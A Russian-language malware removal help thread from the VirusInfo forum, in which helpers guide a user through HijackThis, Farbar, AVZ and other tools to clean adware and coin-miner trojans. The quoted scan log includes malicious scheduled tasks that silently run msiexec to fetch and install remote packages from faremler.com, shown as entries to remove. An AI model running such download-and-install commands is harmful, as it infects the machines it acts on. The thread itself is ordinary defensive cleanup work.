Появляются неизвестные процессы в диспетчере задач, открываются рекламные сайты в Opera.
Printable View
Появляются неизвестные процессы в диспетчере задач, открываются рекламные сайты в Opera.
Уважаемый(ая) [B]FatalMouse[/B], спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Запустите HijackThis, расположенный в папке Autologger (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B])и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url] :[code]O22 - Task (.job): (Ready) update-S-1-5-21-935787954-3714542951-3318145870-1000.job - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe (file missing) -runmode=checkupdate
O22 - Task (.job): (Ready) update-sys.job - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe (file missing) -runmode=checkupdate
O22 - Task: BlueStacksHelper - C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: RealDownloader Update Check - C:\Program Files (x86)\Real\RealDownloader\downloader2.exe /scheduler (file missing)
O22 - Task: update-S-1-5-21-935787954-3714542951-3318145870-1000 - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (file missing)
O22 - Task: update-sys - C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (file missing)
O22 - Task: {03CC4111-A719-8D53-374A-B199C2F384EF} - C:\WINDOWS\system32\msiexec.exe -i https://faremler.com/pxbefdqqwywm.jnh -q
O22 - Task: {2599D2B5-65CD-BA1F-4184-07D3CBD04A89} - C:\WINDOWS\system32\msiexec.exe -package https://faremler.com/g1k0lg5um599.soy /q[/code]
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Выполнил
Распакуйте fixlist.txt из вложения в папку с Farbar Recovery Scan Tool.
[ATTACH=CONFIG]675582[/ATTACH]
Отключите до перезагрузки антивирус, запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Упакуйте и прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Сделал.
Проблема решена? Если да, переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
Процессы из диспетчера задач исчезли, но все равно открывается рекламная страница Asompharr.com в Opera и антивирус после каждой перезагрузки находит Trojan:Win32/Tiggre!rfn, Trojan:Win32/CoinMiner.C!cl, Trojan:Win32/Fuerboos.C!cl
Сделайте новый лог [URL="https://yadi.sk/d/7dgjMleO3E3E9b"]такой версией Autologger[/URL].
Сделал.
[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
DeleteFile('C:\Users\артем\Favorites\Links\Интернет.url');
DeleteSchedulerTask('{28F7E8EA-8EEF-BEE4-24A9-5DAFB0DC8F1F}');
ExecuteWizard('SCU',2,2,true);
RebootWindows(false);
end.[/code]Компьютер перезагрузится.
Скачайте и запустите TDSSKiller: [url]http://support.kaspersky.ru/viruses/disinfection/5350[/url].
Файл C:\TDSSKiller.***_log.txt приложите в теме? в архиве.
(где *** - версия программы, дата и время запуска.)
Сделал.
Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и сделайте [URL="https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810"]полный образ автозапуска uVS[/URL].
Программа запускается и на моменте проверки автозапуска зависает. Ждал около получаса и ничего.
Антивирус отключали?
Попробуйте запускать файл startf.exe (все несистемные процессы, включая браузеры и пр. будут принудительно закрыты!).
Антивирус отключал.
Сейчас попробую запустить через startf. А какой там надо выбрать пункт в первом окне? "Запустить под текущим пользователем" не вижу.
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Запустил через startf, но все тоже самое.
У меня такая же ситуация была, когда еще не избавились от процессов в диспетчере задач, AVZ просто зависала, пока не снял задачи в диспетчере и перезапустил AVZ.
Попробуйте в безопасном режиме системы.
В безопасном режиме тоже самое. После запуска внизу проходит несколько пунктов и на анализе автозапуска программа виснет.
Сделайте проверку Dr. Web CureIt!